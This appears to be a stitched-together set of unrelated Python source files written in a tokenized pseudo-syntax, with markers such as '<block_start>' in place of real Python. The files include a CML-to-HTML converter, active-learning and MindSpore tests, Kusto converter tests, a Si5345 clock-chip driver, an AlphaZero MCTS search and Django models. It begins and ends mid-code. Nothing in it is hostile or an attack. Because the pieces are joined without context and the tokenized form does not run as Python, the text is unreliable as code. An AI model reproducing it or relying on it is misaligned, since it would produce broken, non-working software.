'sy':sy[idx]}<line_sep>geometries.append(geometry)<block_end><return>geometries<block_end><def_stmt>construct_big_image self geometry<block_start>self.current_mask=np.zeros((geometry['rows'] geometry['cols']) np.uint8)<line_sep>self.current_prediction=np.zeros((geometry['rows'] geometry['cols']) np.float32)<block_end><def_stmt>save self name prediction prefix=""<block_start>cv2.imwrite(os.path.join(self.save_dir prefix+name) (prediction<times>255).astype(np.uint8))<block_end><def_stmt>post_predict_action self prefix<block_start>self.on_image_constructed(self.current_image_name self.current_prediction/self.current_mask prefix=prefix)<line_sep>self.current_image_name=<none><block_end><block_end>
<import_stmt>logging<import_stmt>copy<import_stmt>re<import_from_stmt>urllib.parse quote<import_stmt>bs4<import_stmt>jinja2<import_from_stmt>.resource load_resource<import_from_stmt>.define URL_ROOT<def_stmt>_is_root e<block_start><return>e.parent<is><none><block_end><def_stmt>_is_tag e<block_start><return>isinstance(e bs4.Tag)<block_end><def_stmt>_has_no_child tag<block_start><return>len(tag.contents)<eq>0<block_end><class_stmt>Traversal<block_start>'''depth-first traversal '''<def_stmt>__init__ self root * tagOnly=<false><block_start><assert_stmt>_is_root(root)<line_sep>self._e=root<line_sep>self._skip_children=<false><line_sep>self._tagOnly=tagOnly<block_end><def_stmt>__iter__ self<block_start><return>self<block_end><def_stmt>__next__ self<block_start>e=self._next()<if_stmt>e<is><none><block_start><raise>StopIteration('no more element')<block_end>self._e=e<line_sep>self._skip_children=<false><line_sep><return>e<block_end><def_stmt>_next self<block_start><if_stmt>(<not>self._skip_children)<and>_is_tag(self._e)<block_start><for_stmt>e self._e.children<block_start><if_stmt>(<not>self._tagOnly)<or>_is_tag(e)<block_start><return>e<block_end><block_end><block_end>e=self._e<while_stmt><true><block_start><if_stmt>_is_root(e)<block_start><return><none><block_end><for_stmt>_e e.next_siblings<block_start><if_stmt>(<not>self._tagOnly)<or>_is_tag(_e)<block_start><return>_e<block_end><block_end>e=e.parent<block_end><block_end><def_stmt>skip_children self<block_start>self._skip_children=<true><block_end><block_end><class_stmt>CML<block_start><def_stmt>__init__ self doc<block_start>doc=doc.translate(doc.maketrans('\u21b5' ' '))<line_sep>self._root=bs4.BeautifulSoup(doc 'lxml-xml')<line_sep>self._assets=<none><line_sep>self._assetIDs=<none><line_sep>self._refids=<none><line_sep>self._html=<none><block_end><def_stmt>get_resources self * _pat_ref=re.compile(r'%s/learn/[^/]+/resources/([0-9a-zA-Z-]+)'%URL_ROOT)<block_start><if_stmt>self._assets<is><none><block_start>self._assets=[]<line_sep>self._assetIDs=[]<line_sep>self._refids=[]<for_stmt>e Traversal(self._root tagOnly=<true>)<block_start><if_stmt>e.name<eq>'asset'<block_start>self._assetIDs.append(e['id'])<block_end><elif_stmt>e.name<eq>'img'<block_start><if_stmt>e.get('src')<block_start><import_stmt>uuid<import_from_stmt>.lib.misc url_basename<import_from_stmt>.define Asset<line_sep>id_=str(uuid.uuid4())<line_sep>e['assetId']=id_<line_sep>url=e['src']<line_sep>name=url_basename(url)<line_sep>self._assets.append(Asset(id_=id_ url=url name=name))<block_end><else_stmt><block_start>self._assetIDs.append(e['assetId'])<block_end><block_end><elif_stmt>e.name<eq>'a'<block_start>match=_pat_ref.match(e['href'])<if_stmt>match<block_start>_=match.group(1)<line_sep>self._refids.append(_)<line_sep>e['refid']=_<block_end><block_end><block_end><block_end><return>self._assets self._assetIDs self._refids<block_end><def_stmt>to_html self * assets<block_start><if_stmt>self._html<is><not><none><block_start><return>self._html<block_end>asset_by_id={_['id']:_<for>_ assets}<def_stmt>_assetName id_<block_start><return>asset_by_id[id_]['name']<block_end>html=bs4.BeautifulSoup('' 'lxml')<line_sep>d={}<def_stmt>_add e0 
e1<block_start>parent1=html<line_sep>_e=e0<while_stmt>_e<is><not><none><block_start><if_stmt>id(_e)<in>d<block_start>parent1=d[id(_e)]<line_sep><break><block_end>_e=_e.parent<block_end><if_stmt>(parent1<is>html)<and>(<not>_is_tag(e0))<block_start><return><block_end><if_stmt>_is_tag(e0)<block_start>d[id(e0)]=e1<block_end>parent1.append(e1)<block_end>tr=Traversal(self._root)<for_stmt>e0 tr<block_start><if_stmt>isinstance(e0 bs4.NavigableString)<block_start>_li=str(e0).split('$$')<line_sep>hasMath=<false><for_stmt>_ _li<block_start><if_stmt><not>hasMath<block_start>_add(e0 _)<block_end><else_stmt><block_start>_span=bs4.Tag(name='span')<line_sep>_span['hasMath']='true'<line_sep>_span.append(_)<line_sep>_add(e0 _span)<block_end>hasMath=<not>hasMath<block_end><continue><block_end><if_stmt><not>_is_tag(e0)<block_start><continue><block_end><if_stmt>e0.name<eq>'asset'<block_start><assert_stmt>_has_no_child(e0)<line_sep>e1=bs4.Tag(name='p')<line_sep>e1['class']='asset'<line_sep>e1.append(_assetName(e0['id']))<block_end><elif_stmt>e0.name<eq>'img'<block_start><assert_stmt>_has_no_child(e0)<line_sep>e1=bs4.Tag(name='img')<line_sep>e1['src']=e1['alt']=_assetName(e0['assetId'])<line_sep>e1['src']=quote(e1['src'])<block_end><elif_stmt>e0.name<eq>'heading'<block_start>e1=bs4.Tag(name='h%d'%int(e0['level']))<block_end><elif_stmt>e0.name<eq>'text'<block_start>e1=bs4.Tag(name='p')<block_end><elif_stmt>e0.name<eq>'list'<block_start>bulletType=e0['bulletType']<if_stmt>bulletType<eq>'numbers'<block_start>e1=bs4.Tag(name='ol')<line_sep>e1['type']='1'<block_end><elif_stmt>bulletType<eq>'bullets'<block_start>e1=bs4.Tag(name='ul')<block_end><else_stmt><block_start>e1=bs4.Tag(name='ul')<line_sep>logging.warning('[CML] unknown bulletType=%s'%bulletType)<block_end><block_end><elif_stmt>e0.name<eq>'a'<block_start>e1=bs4.Tag(name='a')<line_sep>e1['href']=e0['href']<if_stmt>e0.get('refid')<block_start>e1['refid']=e0['refid']<block_end><block_end><elif_stmt>e0.name<eq>'code'<block_start>e1=bs4.Tag(name='pre')<line_sep>e1.append(copy.copy(e0))<line_sep>tr.skip_children()<block_end><elif_stmt>e0.name<in>['li' 'strong' 'em' 'u' 'table' 'tr' 'td' 'th' 'sup' 'sub']<block_start>e1=bs4.Tag(name=e0.name)<block_end><elif_stmt>e0.name<in>['co-content']<block_start><continue><block_end><else_stmt><block_start>logging.warning('[CML] unknown e0.name=%s\n%s'%(e0.name e0))<line_sep><continue><block_end>_add(e0 e1)<block_end>self._html=str(html)<line_sep><return>self._html<block_end><block_end><def_stmt>render_supplement * content resource_path title='' __={}<block_start><if_stmt>__.get('template')<is><none><block_start>__['template']=jinja2.Template(load_resource('template/supplement.html').decode('UTF-8'))<block_end><return>__['template'].render(content=content resource_path=resource_path title=title)<block_end>
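# Editor's hedged usage sketch (not part of the original module): typical call order for the classes above; 'doc' is a hypothetical CML string and 'assets' a hypothetical list of dict-like records with 'id' and 'name' keys, as expected by to_html(). cml=CML(doc)<line_sep>_,asset_ids,ref_ids=cml.get_resources()<line_sep>html=cml.to_html(assets=assets)<line_sep>page=render_supplement(content=html resource_path='resources' title='Supplement')<line_sep>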
<import_stmt>numpy<as>np<import_from_stmt>small_text.active_learner PoolBasedActiveLearner<def_stmt>get_initialized_active_learner clf_factory query_strategy dataset<block_start>active_learner=PoolBasedActiveLearner(clf_factory query_strategy dataset)<line_sep>x_indices_initial=np.random.choice(np.arange(len(dataset)) size=10 replace=<false>)<line_sep>y_initial=np.array([0 1 0 1 0 1 0 1 0 1])<line_sep>active_learner.initialize_data(x_indices_initial y_initial)<line_sep><return>active_learner<block_end>
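# Editor's hedged usage sketch (not part of the original helper): 'clf_factory', 'query_strategy' and 'dataset' are hypothetical small-text objects; the helper returns a learner that is ready to query. learner=get_initialized_active_learner(clf_factory query_strategy dataset)<line_sep>queried_indices=learner.query(num_samples=10)<line_sep>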
# Copyright 2020 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ <import_stmt>numpy<as>np<import_stmt>mindspore.context<as>context<import_stmt>mindspore.nn<as>nn<import_from_stmt>mindspore Tensor<import_from_stmt>mindspore.ops operations<as>P<line_sep>context.set_context(mode=context.GRAPH_MODE device_target="Ascend")<class_stmt>Net(nn.Cell)<block_start><def_stmt>__init__ self<block_start>super(Net self).__init__()<line_sep>self.mask=P.DropoutGenMask(10 28)<line_sep>self.shape=P.Shape()<block_end><def_stmt>construct self x_ y_<block_start>shape_x=self.shape(x_)<line_sep><return>self.mask(shape_x y_)<block_end><block_end>x=np.ones([2 4 2 2]).astype(np.int32)<line_sep>y=np.array([1.0]).astype(np.float32)<def_stmt>test_net <block_start>mask=Net()<line_sep>tx,ty=Tensor(x) Tensor(y)<line_sep>output=mask(tx ty)<line_sep>print(output.asnumpy())<assert_stmt>([255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255]<eq>output.asnumpy()).all()<block_end>
# Copyright (c) Microsoft Corporation. # Licensed under the MIT License <import_stmt>unittest<import_from_stmt>datetime timedelta<import_from_stmt>azure.kusto.data._converters to_datetime to_timedelta<class_stmt>ConverterTests(unittest.TestCase)<block_start>"""These are unit tests that should test custom converters used in."""<def_stmt>test_to_timestamp self<block_start>"""Happy path to test converter from TimeSpan to timedelta."""<line_sep># Test hours, minutes and seconds <assert_stmt>to_timedelta("00:00:00")<eq>timedelta(seconds=0)<assert_stmt>to_timedelta("00:00:03")<eq>timedelta(seconds=3)<assert_stmt>to_timedelta("00:04:03")<eq>timedelta(minutes=4 seconds=3)<assert_stmt>to_timedelta("02:04:03")<eq>timedelta(hours=2 minutes=4 seconds=3)<line_sep># Test milliseconds <assert_stmt>to_timedelta("00:00:00.099")<eq>timedelta(milliseconds=99)<assert_stmt>to_timedelta("02:04:03.0123")<eq>timedelta(hours=2 minutes=4 seconds=3 microseconds=12300)<line_sep># Test days <assert_stmt>to_timedelta("01.00:00:00")<eq>timedelta(days=1)<assert_stmt>to_timedelta("02.04:05:07")<eq>timedelta(days=2 hours=4 minutes=5 seconds=7)<line_sep># Test negative <assert_stmt>to_timedelta("-01.00:00:00")<eq>-timedelta(days=1)<assert_stmt>to_timedelta("-02.04:05:07")<eq>-timedelta(days=2 hours=4 minutes=5 seconds=7)<line_sep># Test all together <assert_stmt>to_timedelta("00.00:00:00.000")<eq>timedelta(seconds=0)<assert_stmt>to_timedelta("02.04:05:07.789")<eq>timedelta(days=2 hours=4 minutes=5 seconds=7 milliseconds=789)<assert_stmt>to_timedelta("03.00:00:00.111")<eq>timedelta(days=3 milliseconds=111)<line_sep># Test from Ticks <assert_stmt>to_timedelta(-80080008)<eq>timedelta(microseconds=-8008001)<assert_stmt>to_timedelta(10010001)<eq>timedelta(microseconds=1001000)<block_end><def_stmt>test_to_timestamp_fail self<block_start>""" Sad path to test TimeSpan to timedelta converter """<line_sep>self.assertRaises(ValueError to_timedelta "")<line_sep>self.assertRaises(ValueError to_timedelta "foo")<line_sep>self.assertRaises(ValueError to_timedelta "00")<line_sep>self.assertRaises(ValueError to_timedelta "00:00")<line_sep>self.assertRaises(ValueError to_timedelta "03.00:00:00.")<line_sep>self.assertRaises(ValueError to_timedelta "03.00:00:00.111a")<block_end><def_stmt>test_to_datetime self<block_start>"""Tests datetime read by KustoResultIter"""<assert_stmt>to_datetime("2016-06-07T16:00:00Z")<is><not><none><block_end><def_stmt>test_to_datetime_fail self<block_start>"""Tests that invalid strings fails to convert to datetime"""<line_sep>self.assertRaises(ValueError to_datetime "invalid")<block_end><block_end>
"""Tests for the panel_custom component."""<line_sep>
<import_from_stmt>paz.abstract Processor<import_stmt>numpy<as>np<class_stmt>MakeDictionary(Processor)<block_start><def_stmt>__init__ self encoder renderer<block_start>super(MakeDictionary self).__init__()<line_sep>self.latent_dimension=encoder.encoder.output_shape[1]<line_sep>self.encoder=encoder<line_sep>self.renderer=renderer<block_end><def_stmt>call self<block_start>data=self.renderer.render()<line_sep>dictionary={}<line_sep>latent_vectors=np.zeros((len(data) self.latent_dimension))<for_stmt>sample_arg,sample enumerate(data)<block_start>image=sample['image']<line_sep>latent_vectors[sample_arg]=self.encoder(image)<line_sep>dictionary[sample_arg]=image<block_end>dictionary['latent_vectors']=latent_vectors<line_sep><return>dictionary<block_end><block_end><class_stmt>MeasureSimilarity(Processor)<block_start><def_stmt>__init__ self dictionary measure<block_start>super(MeasureSimilarity self).__init__()<line_sep>self.dictionary=dictionary<line_sep>self.measure=measure<block_end><def_stmt>call self latent_vector<block_start>latent_vectors=self.dictionary['latent_vectors']<line_sep>measurements=self.measure(latent_vectors latent_vector)<line_sep>closest_image=self.dictionary[np.argmax(measurements)]<line_sep><return>latent_vector closest_image<block_end><block_end>
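# Editor's hedged usage sketch (not part of the original processors): 'encoder', 'renderer', 'measure' and 'query_image' are hypothetical objects matching the interfaces assumed above. dictionary=MakeDictionary(encoder renderer)()<line_sep>latent_vector,closest_image=MeasureSimilarity(dictionary measure)(encoder(query_image))<line_sep>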
#----------------------------------------------------------------------------- # This file is part of 'SLAC Firmware Standard Library'. # It is subject to the license terms in the LICENSE.txt file found in the # top-level directory of this distribution and at: # https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html. # No part of 'SLAC Firmware Standard Library', including this file, # may be copied, modified, propagated, or distributed except according to # the terms contained in the LICENSE.txt file. #----------------------------------------------------------------------------- <import_stmt>pyrogue<as>pr<import_stmt>surf.devices.silabs<as>silabs<import_stmt>csv<import_stmt>click<import_stmt>fnmatch<import_stmt>rogue<class_stmt>Si5345Lite(pr.Device)<block_start><def_stmt>__init__ self simpleDisplay=<true> advanceUser=<false> liteVersion=<true> **kwargs<block_start>self._useVars=rogue.Version.greaterThanEqual('5.4.0')<if_stmt>self._useVars<block_start>size=0<block_end><else_stmt><block_start>size=(0x1000<lshift>2)<block_end># 16KB super().__init__(size=size **kwargs)<line_sep>self.add(pr.LocalVariable(name="CsvFilePath" description="Used if command's argument is empty" mode="RW" value="" ))<line_sep>############################## # Commands ############################## @self.command(value='' description="Load the .CSV from CBPro." )<def_stmt>LoadCsvFile arg# Check if non-empty argument <block_start><if_stmt>(arg<ne>"")<block_start>path=arg<block_end><else_stmt># Use the variable path instead <block_start>path=self.CsvFilePath.get()<block_end># Check for .csv file <if_stmt>fnmatch.fnmatch(path '*.csv')<block_start>click.secho(f'{self.path}.LoadCsvFile(): {path}' fg='green')<block_end><else_stmt><block_start>click.secho(f'{self.path}.LoadCsvFile(): {path} is not .csv' fg='red')<line_sep><return><block_end># Power down during the configuration load self.Page0.PDN.set(<true>)<line_sep># Open the .CSV file <with_stmt>open(path)<as>csvfile<block_start>reader=csv.reader(csvfile delimiter=',' quoting=csv.QUOTE_NONE)<line_sep># Loop through the rows in the CSV file <for_stmt>row reader<block_start><if_stmt>(row[0]<ne>'Address')<block_start>self._setValue(offset=(int(row[0] 16)<lshift>2) data=int(row[1] 16) )<block_end><block_end><block_end># Update local RemoteVariables and verify conflagration self.readBlocks(recurse=<true>)<line_sep>self.checkBlocks(recurse=<true>)<line_sep># Execute the Page5.BW_UPDATE_PLL command self.Page5.BW_UPDATE_PLL()<line_sep># Power Up after the configuration load self.Page0.PDN.set(<false>)<line_sep># Clear the internal error flags self.Page0.ClearIntErrFlag()<block_end>############################## # Pages ############################## self._pages={0:silabs.Si5345Page0(offset=(0x000<lshift>2) simpleDisplay=simpleDisplay expand=<false>) # 0x0000 - 0x03FF 1:silabs.Si5345Page1(offset=(0x100<lshift>2) simpleDisplay=simpleDisplay expand=<false> hidden=<not>(advanceUser) liteVersion=liteVersion) # 0x0400 - 0x07FF 2:silabs.Si5345Page2(offset=(0x200<lshift>2) simpleDisplay=simpleDisplay expand=<false> hidden=<not>(advanceUser) liteVersion=liteVersion) # 0x0800 - 0x0BFF 3:silabs.Si5345Page3(offset=(0x300<lshift>2) simpleDisplay=simpleDisplay expand=<false> hidden=<not>(advanceUser) liteVersion=liteVersion) # 0x0C00 - 0x0FFF 4:silabs.Si5345Page4(offset=(0x400<lshift>2) simpleDisplay=simpleDisplay expand=<false> hidden=<not>(advanceUser) liteVersion=liteVersion) # 0x1000 - 0x13FF 5:silabs.Si5345Page5(offset=(0x500<lshift>2) simpleDisplay=simpleDisplay expand=<false> 
hidden=<not>(advanceUser) liteVersion=liteVersion) # 0x1400 - 0x17FF 6:silabs.Si5345PageBase(name='Page6' offset=(0x600<lshift>2) expand=<false> hidden=<not>(advanceUser)) # 0x1800 - 0x1BFF 7:silabs.Si5345PageBase(name='Page7' offset=(0x700<lshift>2) expand=<false> hidden=<not>(advanceUser)) # 0x1C00 - 0x1FFF 8:silabs.Si5345PageBase(name='Page8' offset=(0x800<lshift>2) expand=<false> hidden=<not>(advanceUser)) # 0x2000 - 0x23FF 9:silabs.Si5345Page9(offset=(0x900<lshift>2) simpleDisplay=simpleDisplay expand=<false> hidden=<not>(advanceUser) liteVersion=liteVersion) # 0x2400 - 0x27FF 10:silabs.Si5345PageA(offset=(0xA00<lshift>2) simpleDisplay=simpleDisplay expand=<false> hidden=<not>(advanceUser) liteVersion=liteVersion) # 0x2800 - 0x2BFF 11:silabs.Si5345PageB(offset=(0xB00<lshift>2) simpleDisplay=simpleDisplay expand=<false> hidden=<not>(advanceUser) liteVersion=liteVersion) # 0x2C00 - 0x2FFF }<line_sep># Add Pages <for_stmt>k,v self._pages.items()<block_start>self.add(v)<block_end>self.add(pr.LinkVariable(name='Locked' description='Inverse of LOL' mode='RO' dependencies=[self.Page0.LOL] linkedGet=<lambda>:(<false><if>self.Page0.LOL.value()<else><true>)))<block_end><def_stmt>_setValue self offset data<block_start><if_stmt>self._useVars# Note: index is byte index (not word index) <block_start>self._pages[offset<floordiv>0x400].DataBlock.set(value=data index=(offset%0x400)<rshift>2)<block_end><else_stmt><block_start>self._rawWrite(offset data)<block_end><block_end><block_end># Deprecated
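# Editor's hedged usage sketch (not part of the original device class): add the device to a hypothetical pyrogue Root ('root', 'srp') and load a CBPro-exported CSV through the LoadCsvFile command defined above. root.add(Si5345Lite(name='Pll' offset=0x0 memBase=srp))<line_sep>root.Pll.LoadCsvFile('Si5345-Registers.csv')<line_sep>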
""" Contains logic for performing Monte Carlo Tree Search having access to the environment. The class is an adaptation of AlphaZero-General's MCTS search to accommodate non-adversarial environments (MDPs). We utilize the MinMax scaling of backed-up rewards for the UCB formula and (by default) compute the UCB using the formula proposed by the MuZero algorithm. The MCTS returns both the estimated root-value and action probabilities. The MCTS also discounts backed up rewards given that gamma < 1. Notes: - Adapted from https://github.com/suragnair/alpha-zero-general - Base implementation done. - Documentation 15/11/2020 """<import_stmt>typing<import_stmt>numpy<as>np<import_from_stmt>AlphaZero.AlphaNeuralNet AlphaZeroNeuralNet<import_from_stmt>utils DotDict<import_from_stmt>utils.selfplay_utils MinMaxStats GameHistory GameState<line_sep>EPS=1e-8<class_stmt>MCTS<block_start>""" This class handles the MCTS tree while having access to the environment logic. """<line_sep>CANONICAL:bool=<false># Whether to compute the UCB formula using AlphaZero's formula (true) or MuZero's formula. <def_stmt>__init__ self game neural_net:AlphaZeroNeuralNet args:DotDict<arrow><none><block_start>""" Initialize all requisite variables for performing MCTS for AlphaZero. :param game: Game Implementation of Game class for environment logic. :param neural_net: AlphaNeuralNet Implementation of AlphaNeuralNet class for inference. :param args: DotDict Data structure containing parameters for the tree search. """<line_sep>self.game=game<line_sep>self.neural_net=neural_net<line_sep>self.args=args<line_sep># Static helper variables. self.single_player=game.n_players<eq>1<line_sep>self.action_size=game.getActionSize()<line_sep># Gets reinitialized at every search self.minmax=MinMaxStats(self.args.minimum_reward self.args.maximum_reward)<line_sep>self.Qsa={}# stores Q values for s,a (as defined in the paper) self.Ssa={}# stores state transitions for s, a self.Rsa={}# stores R values for s,a self.Nsa={}# stores #times edge s,a was visited self.Ns={}# stores #times board s was visited self.Ps={}# stores initial policy (returned by neural net) self.Vs={}<block_end># stores game.getValidMoves for board s <def_stmt>clear_tree self<arrow><none><block_start>""" Clear all statistics stored in the current search tree """<line_sep>self.Qsa,self.Ssa,self.Rsa,self.Nsa,self.Ns,self.Ps,self.Vs=[{}<for>_ range(7)]<block_end><def_stmt>initialize_root self state:GameState trajectory:GameHistory<arrow>typing.Tuple[bytes float]<block_start>""" Perform initial inference for the root state and perturb the network prior with Dirichlet noise. Additionally mask the illegal moves in the network prior and initialize all statistics for starting the MCTS search. :param state: GameState Data structure containing the current state of the environment. :param trajectory: GameHistory Data structure containing the entire episode trajectory of the agent(s). :return: tuple (hash, root_value) The hash of the environment state and inferred root-value. """<line_sep>network_input=trajectory.stackObservations(self.neural_net.net_args.observation_length state.observation)<line_sep>pi_0,v_0=self.neural_net.predict(network_input)<line_sep>s_0=self.game.getHash(state)<line_sep># Add Dirichlet Exploration noise noise=np.random.dirichlet([self.args.dirichlet_alpha]<times>len(pi_0))<line_sep>self.Ps[s_0]=noise<times>self.args.exploration_fraction+(1-self.args.exploration_fraction)<times>pi_0<line_sep># Mask the prior for illegal moves, and re-normalize accordingly. 
self.Vs[s_0]=self.game.getLegalMoves(state)<line_sep>self.Ps[s_0]<augmul>self.Vs[s_0]<line_sep>self.Ps[s_0]=self.Ps[s_0]/np.sum(self.Ps[s_0])<line_sep># Sum of visit counts of the edges/ children and legal moves. self.Ns[s_0]=0<line_sep><return>s_0 v_0<block_end><def_stmt>compute_ucb self s:bytes a:int exploration_factor:float<arrow>float<block_start>""" Compute the UCB for an edge (s, a) within the MCTS tree: PUCT(s, a) = MinMaxNormalize(Q(s, a)) + P(s, a) * sqrt(visits_parent / (1 + visits_s)) * exploration_factor Where the exploration factor is either the exploration term of MuZero (default) or a float c_1. Illegal edges are returned as zeros. The Q values within the tree are MinMax normalized over the accumulated statistics over the current tree search. :param s: hash Key of the current state inside the MCTS tree. :param a: int Action key representing the path to reach the child node from path (s, a) :param exploration_factor: float Pre-computed exploration factor from the MuZero PUCT formula. :return: float Upper confidence bound with neural network prior """<if_stmt>s<in>self.Vs<and><not>self.Vs[s][a]<block_start><return>0<block_end>visit_count=self.Nsa[(s a)]<if>(s a)<in>self.Nsa<else>0<line_sep>q_value=self.minmax.normalize(self.Qsa[(s a)])<if>(s a)<in>self.Qsa<else>0<line_sep>c_children=np.max([self.Ns[s] 1e-8])# Ensure that prior doesn't collapse to 0 if s is new. # Exploration <if_stmt>self.CANONICAL# Standard PUCT formula from the AlphaZero paper <block_start>ucb=self.Ps[s][a]<times>np.sqrt(c_children)/(1+visit_count)<times>self.args.c1<block_end><else_stmt># The PUCT formula from the MuZero paper <block_start>ucb=self.Ps[s][a]<times>np.sqrt(c_children)/(1+visit_count)<times>exploration_factor<block_end>ucb<augadd>q_value# Exploitation <return>ucb<block_end><def_stmt>runMCTS self state:GameState trajectory:GameHistory temp:int=1<arrow>typing.Tuple[np.ndarray float]<block_start>""" This function performs 'num_MCTS_sims' simulations of MCTS starting from the provided root GameState. Before the search we only clear statistics stored inside the MinMax tree. In this way we ensure that reward bounds get refreshed over time/ don't get affected by strong reward scaling in past searches. This implementation, thus, reuses state state transitions from past searches. This may influence memory usage. Our estimation of the root-value of the MCTS tree search is based on a sample average of each backed-up MCTS value. This means that this estimate represents an on-policy estimate V^pi. Illegal moves are masked before computing the action probabilities. :param state: GameState Data structure containing the current state of the environment. :param trajectory: GameHistory Data structure containing the entire episode trajectory of the agent(s). :param temp: float Visit count exponentiation factor. A value of 0 = Greedy, +infinity = uniformly random. :return: tuple (pi, v) The move probabilities of MCTS and the estimated root-value of the policy. """<line_sep># Refresh value bounds in the tree self.minmax.refresh()<line_sep># Initialize the root variables needed for MCTS. s_0,v_0=self.initialize_root(state trajectory)<line_sep># Aggregate root state value over MCTS back-propagated values v_search=sum([self._search(state trajectory)<for>_ range(self.args.num_MCTS_sims-1)])<line_sep>v=(v_0+(v_search<if>self.single_player<else>-v_search))/self.args.num_MCTS_sims<line_sep># MCTS Visit count array for each edge 'a' from root node 's_0'. 
counts=np.array([self.Nsa[(s_0 a)]<if>(s_0 a)<in>self.Nsa<else>0<for>a range(self.action_size)])<if_stmt>temp<eq>0# Greedy selection. One hot encode the most visited paths (randomly break ties). <block_start>move_probabilities=np.zeros(len(counts))<line_sep>move_probabilities[np.argmax(counts+np.random.randn(len(counts))<times>1e-8)]=1<block_end><else_stmt><block_start>counts=np.power(counts 1./temp)<line_sep>move_probabilities=counts/np.sum(counts)<block_end><return>move_probabilities v<block_end><def_stmt>_search self state:GameState trajectory:GameHistory path:typing.Tuple[int <ellipsis>]=tuple()<arrow>float<block_start>""" Recursively perform MCTS search inside the actual environments with search-paths guided by the PUCT formula. Selection chooses an action for expanding/ traversing the edge (s, a) within the tree search. The exploration_factor for the PUCT formula is computed within this function for efficiency: exploration_factor = c1 * log(visits_s + c2 + 1) - log(c2) Setting AlphaMCTS.CANONICAL to true sets exploration_factor just to c1. If an edge is expanded, we perform a step within the environment (with action a) and observe the state transition, reward, and infer the new move probabilities, and state value. If an edge is traversed, we simply look up earlier inferred/ observed values from the class dictionaries. During backup we update the current value estimates of an edge Q(s, a) using an average, we additionally update the MinMax statistics to get reward/ value boundaries for the PUCT formula. Note that backed-up values get discounted for gamma < 1. For adversarial games, we negate the backed up value G_k at each backup. The actual search-path 'path' is kept as a debugging-variable, it currently has no practical use. This method may raise a recursion error if the environment creates cycles, this should be highly improbable for most environments. If this does occur, the environment can be altered to terminate after n visits to some cycle. :param state: GameState Numerical prediction of the state by the encoder/ dynamics model. :param trajectory: GameHistory Data structure containing all observations until the current search-depth. :param path: tuple of integers representing the tree search-path of the current function call. :return: float The backed-up discounted/ Monte-Carlo returns (dependent on gamma) of the tree search. :raises RecursionError: When cycles occur within the search path, the search can get stuck *ad infinitum*. """<line_sep>s=self.game.getHash(state)<line_sep>### SELECTION # pick the action with the highest upper confidence bound exploration_factor=self.args.c1+np.log(self.Ns[s]+self.args.c2+1)-np.log(self.args.c2)<line_sep>confidence_bounds=np.asarray([self.compute_ucb(s a exploration_factor)<for>a range(self.action_size)])<line_sep>a=np.flatnonzero(self.Vs[s])[np.argmax(confidence_bounds[self.Vs[s].astype(bool)])]# Get masked argmax. # Default leaf node value. Future possible future reward is 0. Variable is overwritten if edge is non-terminal. value=0<if_stmt>(s a)<not><in>self.Ssa### ROLLOUT for valid moves <block_start>next_state,reward=self.game.getNextState(state a clone=<true>)<line_sep>s_next=self.game.getHash(next_state)<line_sep># Transition statistics. self.Rsa[(s a)],self.Ssa[(s a)],self.Ns[s_next]=reward next_state 0<line_sep># Inference for non-terminal nodes. <if_stmt><not>next_state.done# Build network input for inference. 
<block_start>network_input=trajectory.stackObservations(self.neural_net.net_args.observation_length state.observation)<line_sep>prior,value=self.neural_net.predict(network_input)<line_sep># Inference statistics. Alternate value perspective due to adversary (model predicts for next player). self.Ps[s_next],self.Vs[s_next]=prior self.game.getLegalMoves(next_state)<line_sep>value=value<if>self.single_player<else>-value<block_end><block_end><elif_stmt><not>self.Ssa[(s a)].done### EXPANSION <block_start>trajectory.observations.append(state.observation)# Build up an observation trajectory inside the tree value=self._search(self.Ssa[(s a)] trajectory path+(a ))<line_sep>trajectory.observations.pop()# Clear tree observation trajectory when backing up <block_end>### BACKUP gk=self.Rsa[(s a)]+self.args.gamma<times>value# (Discounted) Value of the current node <if_stmt>(s a)<in>self.Qsa<block_start>self.Qsa[(s a)]=(self.Nsa[(s a)]<times>self.Qsa[(s a)]+gk)/(self.Nsa[(s a)]+1)<line_sep>self.Nsa[(s a)]<augadd>1<block_end><else_stmt><block_start>self.Qsa[(s a)]=gk<line_sep>self.Nsa[(s a)]=1<block_end>self.minmax.update(self.Qsa[(s a)])<line_sep>self.Ns[s]<augadd>1<line_sep><return>gk<if>self.single_player<else>-gk<block_end><block_end>
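# Editor's hedged usage sketch (not part of the original class): one search call from a self-play loop; 'game', 'neural_net', 'args', 'state' and 'trajectory' are hypothetical objects satisfying the interfaces documented in the docstrings above. mcts=MCTS(game neural_net args)<line_sep>pi,root_value=mcts.runMCTS(state trajectory temp=1)<line_sep>action=np.argmax(pi)<line_sep>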
<import_stmt>functools<import_stmt>operator<import_stmt>cudf<import_stmt>pandas<as>pd<import_from_stmt>optimus.engines.base.dataframe.rows DataFrameBaseRows<import_from_stmt>optimus.engines.base.cudf.rows CUDFBaseRows<import_from_stmt>optimus.engines.base.rows BaseRows<class_stmt>Rows(DataFrameBaseRows CUDFBaseRows BaseRows)<block_start><pass><block_end>
<import_stmt>global_init<as>gi<line_sep>XX=[gi.aa() 3]<line_sep>#pythran export bb() <def_stmt>bb <block_start><return>XX<block_end>
""" See the module-level docstring for implementation details """<import_from_stmt>django.core.validators MinValueValidator<import_from_stmt>django.db models<line_sep># FIXME: these classes should have names which more accurately represent what they do <class_stmt>TaskStatusModel(models.Model)<block_start>created=models.DateTimeField(auto_now_add=<true>)<line_sep>modified=models.DateTimeField(auto_now=<true>)<line_sep>last_started=models.DateTimeField(help_text="Last time when a worker started processing this job" null=<true> blank=<true> )<line_sep>completed=models.DateTimeField(help_text="Time when the job completed without error" null=<true> blank=<true>)<line_sep>failed=models.DateTimeField(help_text="Time when the job failed due to an error" null=<true> blank=<true>)<line_sep>status=models.TextField(help_text="Status message, if any, from the last worker" blank=<true> default="")<line_sep>task_id=models.UUIDField(help_text="UUID of the last Celery task to process this record" null=<true> blank=<true> )<class_stmt>Meta<block_start>abstract=<true><block_end><block_end><class_stmt>ImportJob(TaskStatusModel)<block_start>""" Represents a request by a user to import item(s) from a remote URL """<line_sep>created_by=models.ForeignKey("auth.User" null=<true> 